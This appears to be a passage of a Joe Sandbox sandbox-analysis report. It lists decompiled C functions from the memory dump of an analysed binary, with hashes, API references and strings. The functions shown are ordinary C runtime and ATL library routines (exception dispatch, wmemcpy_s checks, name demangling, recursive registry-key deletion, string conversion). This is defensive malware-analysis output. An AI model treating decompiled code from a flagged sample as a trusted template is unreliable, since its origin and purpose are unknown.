                      • Opcode Fuzzy Hash: dcdc720e0a52286f8c7bdf5c390408315b3444933772a82f5f6f4af3ef98bf9c
                      • Instruction Fuzzy Hash: 135181B5901109ABDF18DF96D881EAF37B9AF98306F044418FD098B241E735EE96CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095D280 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E0095D280(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int* _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v64;
				char _v68;
				void* __esi;
				intOrPtr* _t56;
				signed char _t61;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t125;
				void* _t126;

				_t123 = __edi;
				_t84 = __ebx;
				_t56 = _a4;
				if( *_t56 == 0x80000003) {
					return _t56;
				}
				if( *((intOrPtr*)(E0095C670(__ebx, __ecx, __edi, _t124) + 8)) != 0) {
					_t78 = E0095C670(__ebx, __ecx, __edi, _t124);
					_t124 = _t78;
					_t79 = E0095E220(0);
					_t125 = _t125 + 4;
					if( *((intOrPtr*)(_t78 + 8)) != _t79 &&  *_a4 != 0xe0434f4d &&  *_a4 != 0xe0434352) {
						_t83 = E00959820(_a4, _a8, _a12, _a16, _a20, _a28, _a32);
						_t125 = _t125 + 0x1c;
						if(_t83 != 0) {
							return _t83;
						}
					}
				}
				E0095D6F0( &_v24, _a20, 0);
				if(E0095E140( &_v24) <= 0) {
					L009A0DE0(_t84,  &_v24, _t123, _t124);
				}
				_t61 = E0095E140( &_v24);
				if(_t61 > 0) {
					E009596D0(_t84, _t123, _t124,  &_v48,  &_v24, _a24, _a16, _a20, _a28);
					_t126 = _t125 + 0x18;
					_v16 = _v48;
					_v12 = _v44;
					while(1) {
						_t61 = E0095D950( &_v16,  &_v40);
						if((_t61 & 0x000000ff) == 0) {
							goto L23;
						}
						E0095D8C0( &_v16,  &_v68);
						if(_v68 > _a24 || _a24 > _v64) {
							goto L13;
						} else {
							_push(0);
							_push(0);
							E0095D6C0( &_v32,  &_v68);
							_v8 = E0095E110( &_v32);
							if(_v8[1] == 0 ||  *((char*)(_v8[1] + 8)) == 0) {
								if(( *_v8 & 0x00000040) == 0) {
									_push(0);
									_push(1);
									E0095CC90(_a4, _a8, _a12, _a16, _a20, _v8, 0,  &_v68, _a28, _a32);
									_t126 = _t126 + 0x30;
									goto L13;
								} else {
									goto L21;
								}
							} else {
								L21:
								L13:
								E0095D930( &_v16);
								continue;
							}
						}
						goto L23;
					}
				}
				L23:
				return _t61;
			}





















                      0x0095d280
                      0x0095d280
                      0x0095d287
                      0x0095d290
                      0x00000000
                      0x00000000
                      0x0095d2a0
                      0x0095d2a2
                      0x0095d2a7
                      0x0095d2ab
                      0x0095d2b0
                      0x0095d2b6
                      0x0095d2ea
                      0x0095d2ef
                      0x0095d2f4
                      0x00000000
                      0x00000000
                      0x0095d2f4
                      0x0095d2b6
                      0x0095d304
                      0x0095d313
                      0x0095d317
                      0x0095d317
                      0x0095d31f
                      0x0095d326
                      0x0095d344
                      0x0095d349
                      0x0095d352
                      0x0095d355
                      0x0095d362
                      0x0095d369
                      0x0095d373
                      0x00000000
                      0x00000000
                      0x0095d380
                      0x0095d38b
                      0x00000000
                      0x0095d397
                      0x0095d397
                      0x0095d399
                      0x0095d3a2
                      0x0095d3af
                      0x0095d3b9
                      0x0095d3da
                      0x0095d3e1
                      0x0095d3e3
                      0x0095d40b
                      0x0095d410
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d3dc
                      0x0095d3dc
                      0x0095d35a
                      0x0095d35d
                      0x00000000
                      0x0095d35d
                      0x0095d3b9
                      0x00000000
                      0x0095d38b
                      0x0095d362
                      0x0095d41c
                      0x0095d41c

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D297
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D2A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: MOC$RCC
                      • API String ID: 984050374-2084237596
                      • Opcode ID: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction ID: f3cfa835f95752569d835a4dba1e4aeb09214f27a3f6054768f248a43273c586
                      • Opcode Fuzzy Hash: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction Fuzzy Hash: 16515E71901109EBCB14DF96C881FEE73B9AF88302F148558FD1697291DB34EE49CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096B750 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E0096B750(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t39;
				void* _t43;
				void* _t50;
				void* _t52;
				void* _t60;
				void* _t61;

				_t52 = __ecx;
				if(_a16 == 0) {
					return 0;
				}
				__eflags = _a4;
				if(_a4 == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				__eflags = _v12;
				if(__eflags == 0) {
					_t50 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0, L"%ls", L"destination != nullptr");
					_t60 = _t60 + 0x18;
					__eflags = _t50 - 1;
					if(_t50 == 1) {
						asm("int3");
					}
				}
				__eflags = _v12;
				if(_v12 != 0) {
					__eflags = _a12;
					if(_a12 == 0) {
						L12:
						_t53 = _a4;
						E0096B920(_a4, _a4, 0, _a8);
						_t61 = _t60 + 0xc;
						__eflags = _a12;
						if(_a12 == 0) {
							_v16 = 0;
						} else {
							_v16 = 1;
						}
						_v20 = _v16;
						__eflags = _v20;
						if(__eflags == 0) {
							_t43 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0, L"%ls", L"source != nullptr");
							_t61 = _t61 + 0x18;
							__eflags = _t43 - 1;
							if(_t43 == 1) {
								asm("int3");
							}
						}
						__eflags = _v20;
						if(_v20 != 0) {
							_t54 = _a8;
							__eflags = _a8 - _a16;
							if(_a8 < _a16) {
								_v24 = 0;
							} else {
								_v24 = 1;
							}
							_v28 = _v24;
							__eflags = _v28;
							if(__eflags == 0) {
								_t39 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0, L"%ls", L"size_in_elements >= count");
								_t61 = _t61 + 0x18;
								__eflags = _t39 - 1;
								if(_t39 == 1) {
									asm("int3");
								}
							}
							__eflags = _v28;
							if(_v28 != 0) {
								return 0x16;
							} else {
								 *((intOrPtr*)(L00992F70(_t54))) = 0x22;
								E00992900(L"size_in_elements >= count", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0);
								return 0x22;
							}
						} else {
							 *((intOrPtr*)(L00992F70(_t53))) = 0x16;
							E00992900(L"source != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0);
							return 0x16;
						}
					}
					__eflags = _a8 - _a16;
					if(_a8 >= _a16) {
						E0096B730(_a4, _a12, _a16);
						__eflags = 0;
						return 0;
					}
					goto L12;
				} else {
					 *((intOrPtr*)(L00992F70(_t52))) = 0x16;
					E00992900(L"destination != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0);
					return 0x16;
				}
			}















                      0x0096b750
                      0x0096b75c
                      0x00000000
                      0x0096b75e
                      0x0096b765
                      0x0096b769
                      0x0096b774
                      0x0096b76b
                      0x0096b76b
                      0x0096b76b
                      0x0096b77e
                      0x0096b781
                      0x0096b785
                      0x0096b79c
                      0x0096b7a1
                      0x0096b7a4
                      0x0096b7a7
                      0x0096b7a9
                      0x0096b7a9
                      0x0096b7a7
                      0x0096b7aa
                      0x0096b7ae
                      0x0096b7e0
                      0x0096b7e4
                      0x0096b7f2
                      0x0096b7f8
                      0x0096b7fc
                      0x0096b801
                      0x0096b804
                      0x0096b808
                      0x0096b813
                      0x0096b80a
                      0x0096b80a
                      0x0096b80a
                      0x0096b81d
                      0x0096b820
                      0x0096b824
                      0x0096b83b
                      0x0096b840
                      0x0096b843
                      0x0096b846
                      0x0096b848
                      0x0096b848
                      0x0096b846
                      0x0096b849
                      0x0096b84d
                      0x0096b87f
                      0x0096b882
                      0x0096b885
                      0x0096b890
                      0x0096b887
                      0x0096b887
                      0x0096b887
                      0x0096b89a
                      0x0096b89d
                      0x0096b8a1
                      0x0096b8b8
                      0x0096b8bd
                      0x0096b8c0
                      0x0096b8c3
                      0x0096b8c5
                      0x0096b8c5
                      0x0096b8c3
                      0x0096b8c6
                      0x0096b8ca
                      0x00000000
                      0x0096b8cc
                      0x0096b8d1
                      0x0096b8ea
                      0x00000000
                      0x0096b8f2
                      0x0096b84f
                      0x0096b854
                      0x0096b86d
                      0x00000000
                      0x0096b875
                      0x0096b84d
                      0x0096b7e9
                      0x0096b7ec
                      0x0096b90c
                      0x0096b914
                      0x00000000
                      0x0096b914
                      0x00000000
                      0x0096b7b0
                      0x0096b7b5
                      0x0096b7ce
                      0x00000000
                      0x0096b7d6

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$destination != nullptr$minkernel\crts\ucrt\src\appcrt\string\wmemcpy_s.cpp$size_in_elements >= count$source != nullptr$wmemcpy_s
                      • API String ID: 0-1746489773
                      • Opcode ID: 45a79a39952309a2dc4a6cd036e614e35a4070ff966c12a855ddfbf7ceac4c5f
                      • Instruction ID: 1bf6dba2bda401904c99a05fcbd67fc314036110e5a252c275a3600c1d96e1e6
                      • Opcode Fuzzy Hash: 45a79a39952309a2dc4a6cd036e614e35a4070ff966c12a855ddfbf7ceac4c5f
                      • Instruction Fuzzy Hash: 9C412571EC0309BBDF20AF54CD46BAE7769AB9470CF208455F505A72C2E3B59AC0DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00968D00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 127COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00968D00(void* __ebx, void* __edi, void* __esi, signed char _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				signed char _v76;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				signed int _t45;
				char* _t47;
				intOrPtr _t50;
				char* _t76;
				intOrPtr _t93;
				intOrPtr _t95;
				signed int _t98;

				_t97 = __esi;
				_t96 = __edi;
				_t74 = __ebx;
				_t45 =  *0xa0600c; // 0x5d529087
				_v8 = _t45 ^ _t98;
				_t47 =  *0xb30640; // 0x0
				if( *_t47 != 0x58) {
					_t76 =  *0xb30640; // 0x0
					_t92 =  *_t76;
					if(_t92 != 0x3f) {
						E00966AB0(__ebx, __edi, __esi, _a4, E0095F3F0( &_v104));
						_t50 = _a4;
					} else {
						E00967C80(__ebx, __edi, __esi,  &_v56);
						if(E0096A510() == 0 ||  *0xb30650 == 0) {
							_v80 = E00960060("`template-parameter", 0x13);
							_v76 = _t92;
							_t92 =  &_v96;
							_v48 = E0095FAA0( &_v96,  &_v80,  &_v56);
							E0095FBB0(_v48, _a4, 0x27);
							_t50 = _a4;
						} else {
							E00967D80( &_v56,  &_v24, 0x10);
							_t93 =  *0xb30650; // 0x0
							_v40 = _t93;
							_v32 = _v40;
							 *0x9d62b0(E009A2B00( &_v24));
							_v36 = _v32();
							if(_v36 == 0) {
								_v72 = E00960060("`template-parameter", 0x13);
								_v68 = _t93;
								_v44 = E0095FAA0( &_v88,  &_v72,  &_v56);
								_t92 = _a4;
								E0095FBB0(_v44, _a4, 0x27);
								_t50 = _a4;
							} else {
								_t92 = 0;
								_v25 = 0;
								_push(_v25 & 0x000000ff);
								E0095E750(_a4, _v36);
								_t50 = _a4;
							}
						}
					}
				} else {
					_t95 =  *0xb30640; // 0x0
					_t92 = _t95 + 1;
					 *0xb30640 = _t92;
					_v64 = E00960060("void", 4);
					_v60 = _t92;
					E0095F1F0(_a4,  &_v64);
					_t50 = _a4;
				}
				return E00957280(_t50, _t74, _v8 ^ _t98, _t92, _t96, _t97);
			}




























                      0x00968d00
                      0x00968d00
                      0x00968d00
                      0x00968d06
                      0x00968d0d
                      0x00968d10
                      0x00968d1b
                      0x00968d5a
                      0x00968d60
                      0x00968d66
                      0x00968e83
                      0x00968e8b
                      0x00968d6c
                      0x00968d70
                      0x00968d7f
                      0x00968e44
                      0x00968e47
                      0x00968e52
                      0x00968e5e
                      0x00968e6a
                      0x00968e6f
                      0x00968d92
                      0x00968d9b
                      0x00968da0
                      0x00968da6
                      0x00968db9
                      0x00968dbf
                      0x00968dcb
                      0x00968dd2
                      0x00968e03
                      0x00968e06
                      0x00968e1d
                      0x00968e22
                      0x00968e29
                      0x00968e2e
                      0x00968dd4
                      0x00968dd4
                      0x00968dd6
                      0x00968ddd
                      0x00968de5
                      0x00968dea
                      0x00968dea
                      0x00968dd2
                      0x00968d7f
                      0x00968d1d
                      0x00968d1d
                      0x00968d23
                      0x00968d26
                      0x00968d3b
                      0x00968d3e
                      0x00968d48
                      0x00968d4d
                      0x00968d4d
                      0x00968e9b

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::getString
                      • String ID: `template-parameter$void
                      • API String ID: 1028460119-4057429177
                      • Opcode ID: 3e5a260dfdfea45250484fa18af67fcddc812ba9877aeeb37baafc6cc0c81dac
                      • Instruction ID: 9e06e97d32025a6ac1d5b1ec69b465b5e6265a99c5c505df4aeb436648fd184a
                      • Opcode Fuzzy Hash: 3e5a260dfdfea45250484fa18af67fcddc812ba9877aeeb37baafc6cc0c81dac
                      • Instruction Fuzzy Hash: CE4157B1D04108DFDB04EFD4ED92AEE7BB5BF88305F148129F50AA7291EB316A05CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00944A80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 91%
                      			E00944A80(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				void* _v28;
				void* _v36;
				struct _FILETIME _v48;
				int _v60;
				char _v324;
				char _v336;
				void* _v340;
				void* _v344;
				void* _v348;
				signed int _t45;
				long _t52;
				void* _t57;
				void* _t59;
				void* _t67;
				intOrPtr* _t74;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				signed int _t103;
				void* _t104;
				void* _t105;

				_t102 = __esi;
				_t70 = __ebx;
				_push(__ecx);
				_t100 =  &_v348;
				memset(_t100, 0xcccccccc, 0x56 << 2);
				_t105 = _t104 + 0xc;
				_t101 = _t100 + 0x56;
				_pop(_t74);
				_t45 =  *0xa0600c; // 0x5d529087
				_v8 = _t45 ^ _t103;
				_v12 = _t74;
				E009441C0( &_v28, 0);
				_v36 = E009445F0( &_v28, __esi,  *_v12, _a4,  *(_v12 + 4) | 0x0002001f);
				if(_v36 == 0) {
					_v60 = 0x100;
					while(1) {
						_t102 = _t105;
						_t96 = _v28;
						_t52 = RegEnumKeyExA(_t96, 0,  &_v324,  &_v60, 0, 0, 0,  &_v48);
						__eflags = _t105 - _t105;
						__eflags = E009D1520(_t52, _t105 - _t105);
						if(__eflags != 0) {
							break;
						}
						_v36 = E00944A80(_t70,  &_v28, _t101, _t102, __eflags,  &_v324);
						__eflags = _v36;
						if(__eflags == 0) {
							_v60 = 0x100;
							continue;
						}
						_v344 = _v36;
						E00944220( &_v28, __eflags);
						_t57 = _v344;
						L11:
						E009D14C0(_t103, 0x944c08);
						_t59 = _t57;
						_t98 = _t96;
						return E009D1520(E00957280(_t59, _t70, _v8 ^ _t103, _t98, _t101, _t102), _t103 - _t105 + 0x158);
					}
					E00944420( &_v28, _t102);
					_t96 = _a4;
					_v348 = E00944310(_v12, _t102, _t96);
					E00944220( &_v28, __eflags);
					_t57 = _v348;
					goto L11;
				}
				if(_v36 != 2) {
					_t110 = _v36 - 3;
					if(_v36 != 3) {
						_t96 = _v36;
						_push(_t96);
						_t67 = E0094F200(0xb337b8);
						E009423E0(__ebx, _t101, __esi, _t110, E009423B0( &_v336, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x18c9), _t67, 0, "CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)\n", _a4);
						_t105 = _t105 + 0x18;
					}
				}
				_v340 = _v36;
				E00944220( &_v28, _t110);
				_t57 = _v340;
				goto L11;
			}



























                      0x00944a80
                      0x00944a80
                      0x00944a8b
                      0x00944a8c
                      0x00944a9c
                      0x00944a9c
                      0x00944a9c
                      0x00944a9e
                      0x00944a9f
                      0x00944aa6
                      0x00944aa9
                      0x00944ab1
                      0x00944ad5
                      0x00944adc
                      0x00944b3e
                      0x00944b45
                      0x00944b45
                      0x00944b5e
                      0x00944b62
                      0x00944b68
                      0x00944b6f
                      0x00944b71
                      0x00000000
                      0x00000000
                      0x00944b82
                      0x00944b85
                      0x00944b89
                      0x00944ba4
                      0x00000000
                      0x00944ba4
                      0x00944b8e
                      0x00944b97
                      0x00944b9c
                      0x00944bd5
                      0x00944bdf
                      0x00944be4
                      0x00944be5
                      0x00944c02
                      0x00944c02
                      0x00944bb0
                      0x00944bb5
                      0x00944bc1
                      0x00944bca
                      0x00944bcf
                      0x00000000
                      0x00944bcf
                      0x00944ae2
                      0x00944ae4
                      0x00944ae8
                      0x00944aea
                      0x00944aed
                      0x00944afe
                      0x00944b1a
                      0x00944b1f
                      0x00944b1f
                      0x00944ae8
                      0x00944b25
                      0x00944b2e
                      0x00944b33
                      0x00000000

                      APIs
                        • Part of subcall function 009445F0: @_RTC_CheckStackVars@8.LIBCMTD ref: 009446FE
                      • _Smanip.LIBCPMTD ref: 00944B14
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      • ~Module.VCCORLIBD ref: 00944B2E
                      • RegEnumKeyExA.ADVAPI32 ref: 00944B62
                      • ~Module.VCCORLIBD ref: 00944B97
                      • ~Module.VCCORLIBD ref: 00944BCA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00944BDF
                      Strings
                      • CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d), xrefs: 00944AF2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944B09
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$EnumSmanip
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)
                      • API String ID: 2188485312-3584847366
                      • Opcode ID: ac9158cd44979364038237aa202e27735b483e05ce12b59a5e96faaf2b0618ba
                      • Instruction ID: 32d981535574c169de2679b7132b3361e8d3f5f4651cb8019ee12bf7eacfa363
                      • Opcode Fuzzy Hash: ac9158cd44979364038237aa202e27735b483e05ce12b59a5e96faaf2b0618ba
                      • Instruction Fuzzy Hash: AB410D71900218EBDB14EF94EC96FEEB7B8FB88705F004159F6066B291DB745A84CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009549E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E009549E0(short* __edx, void* __edi, void* __esi, char* _a4, int _a8) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v28;
				void _v36;
				int _v40;
				int _v44;
				short* _v48;
				int _v52;
				void _v56;
				int _t43;
				void* _t45;
				int _t50;
				int _t58;
				int _t73;
				short* _t74;
				void* _t87;
				void* _t88;
				void* _t89;

				_t74 = __edx;
				memset( &_v56, 0xcccccccc, 0xd << 2);
				_t89 = _t88 + 0xc;
				if(_a4 == 0 || _a8 == 0) {
					_t43 = 0;
					goto L12;
				} else {
					_v8 = 0;
					_v12 = E00941AB0();
					_v16 = 0;
					_v20 = 0;
					E0094F2E0( &_v28);
					_v36 = 0;
					_t50 = MultiByteToWideChar(_v12, 0, _a4, _a8, 0, 0);
					__eflags = _t89 - _t89;
					_v40 = E009D1520(_t50, _t89 - _t89);
					_t52 = _v40;
					_v44 = _v40;
					__eflags = _a8 - 0xffffffff;
					if(_a8 == 0xffffffff) {
						_t73 = _v44 - 1;
						__eflags = _t73;
						_v44 = _t73;
					}
					_t74 = _v44;
					__imp__#4(0, _t74);
					__eflags = _t89 - _t89;
					_v36 = E009D1520(_t52, _t89 - _t89);
					__eflags = _v36;
					if(_v36 == 0) {
						L11:
						_v56 = _v36;
						E0094F220( &_v28);
						_t43 = _v56;
						goto L12;
					} else {
						_t58 = MultiByteToWideChar(_v12, 0, _a4, _a8, _v36, _v40);
						__eflags = _t89 - _t89;
						_v48 = E009D1520(_t58, _t89 - _t89);
						_t74 = _v48;
						__eflags = _t74 - _v40;
						if(__eflags != 0) {
							_t59 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x482, 0, "%ls", L"nResult == nConvertedLen");
							_t89 = _t89 + 0x18;
							__eflags = _t59 - 1;
							if(_t59 == 1) {
								asm("int3");
							}
						}
						__eflags = _v48 - _v40;
						if(_v48 == _v40) {
							goto L11;
						} else {
							_t74 = _v36;
							__imp__#6(_t74);
							__eflags = _t89 - _t89;
							E009D1520(_t59, _t89 - _t89);
							_v52 = 0;
							E0094F220( &_v28);
							_t43 = _v52;
							L12:
							_push(_t74);
							E009D14C0(_t87, 0x954b48);
							_t45 = _t43;
							return E009D1520(_t45, _t87 - _t89 + 0x34);
						}
					}
				}
			}























                      0x009549e0
                      0x009549f5
                      0x009549f5
                      0x009549fb
                      0x00954a03
                      0x00000000
                      0x00954a0a
                      0x00954a0a
                      0x00954a16
                      0x00954a19
                      0x00954a20
                      0x00954a2a
                      0x00954a2f
                      0x00954a4a
                      0x00954a50
                      0x00954a57
                      0x00954a5a
                      0x00954a5d
                      0x00954a60
                      0x00954a64
                      0x00954a69
                      0x00954a69
                      0x00954a6c
                      0x00954a6c
                      0x00954a71
                      0x00954a77
                      0x00954a7d
                      0x00954a84
                      0x00954a87
                      0x00954a8b
                      0x00954b16
                      0x00954b19
                      0x00954b1f
                      0x00954b24
                      0x00000000
                      0x00954a91
                      0x00954aa9
                      0x00954aaf
                      0x00954ab6
                      0x00954ab9
                      0x00954abc
                      0x00954abf
                      0x00954ad9
                      0x00954ade
                      0x00954ae1
                      0x00954ae4
                      0x00954ae6
                      0x00954ae6
                      0x00954ae4
                      0x00954aea
                      0x00954aed
                      0x00000000
                      0x00954aef
                      0x00954af1
                      0x00954af5
                      0x00954afb
                      0x00954afd
                      0x00954b02
                      0x00954b0c
                      0x00954b11
                      0x00954b27
                      0x00954b27
                      0x00954b31
                      0x00954b36
                      0x00954b47
                      0x00954b47
                      0x00954aed
                      0x00954a8b

                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00954A4A
                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00954A77
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?), ref: 00954AA9
                      • SysFreeString.OLEAUT32(00000000), ref: 00954AF5
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00954B31
                      Strings
                      • %ls, xrefs: 00954AC6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h, xrefs: 00954AD2
                      • nResult == nConvertedLen, xrefs: 00954AC1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
